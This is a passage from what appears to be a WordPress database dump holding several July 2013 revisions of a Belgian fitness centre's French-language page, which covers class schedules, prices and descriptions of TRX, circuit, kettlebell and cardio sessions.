style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 16:29:16', '2013-07-03 16:29:16', '', 11, 'http://www.crosstrainingcenter.be/?p=166', 0, 'revision', '', 0),
(162, 1, '2013-07-03 16:17:49', '2013-07-03 16:17:49', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\n[table caption=\"En semaine\" width=\"700\" colwidth=\"30|50|50|50|50|50\" colalign=\"right|left|left|left|left|left\"]\r\n,Lundi[attr class=\"ttitre\"],Mardi,Mercredi,Jeudi,Vendredi\r\n17h30,TRX,CARDIO,RIP-KETTLE,GLFE,TRX\r\n18h15,GLFE,TRX,CARDIO,RIP-KETTLE,GLFE\r\n19h00,RIP-KETTLE,GLFE,TRX,CARDIO,RIP-KETTLE\r\n19h45,CARDIO,RIP-KETTLE,GLFE,TRX,CARDIO\r\n[/table]\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 16:17:49', '2013-07-03 16:17:49', '', 11, 'http://www.crosstrainingcenter.be/?p=162', 0, 'revision', '', 0),
(171, 1, '2013-07-03 16:34:43', '2013-07-03 16:34:43', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\nEn semaine :\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitre\"></td>\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\">MARDI</td>\r\n<td class=\"ttitre\">MERCREDI</td>\r\n<td class=\"ttitre\">JEUDI</td>\r\n<td class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"theure\">17h30</td>\r\n<td >TRX</td>\r\n<td >CARDIO</td>\r\n<td >RIP-KETTLE</td>\r\n<td >GLFE</td>\r\n<td>TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td  class=\"theure\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 16:34:43', '2013-07-03 16:34:43', '', 11, 'http://www.crosstrainingcenter.be/?p=171', 0, 'revision', '', 0),
(170, 1, '2013-07-03 16:33:46', '2013-07-03 16:33:46', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\nEn semaine :\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitre\"></td>\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\">MARDI</td>\r\n<td class=\"ttitre\">MERCREDI</td>\r\n<td class=\"ttitre\">JEUDI</td>\r\n<td class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"theure\">17h30</td>\r\n<td class=\"theure\">TRX</td>\r\n<td class=\"theure\">CARDIO</td>\r\n<td class=\"theure\">RIP-KETTLE</td>\r\n<td class=\"theure\">GLFE</td>\r\n<td class=\"theure\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 16:33:46', '2013-07-03 16:33:46', '', 11, 'http://www.crosstrainingcenter.be/?p=170', 0, 'revision', '', 0);
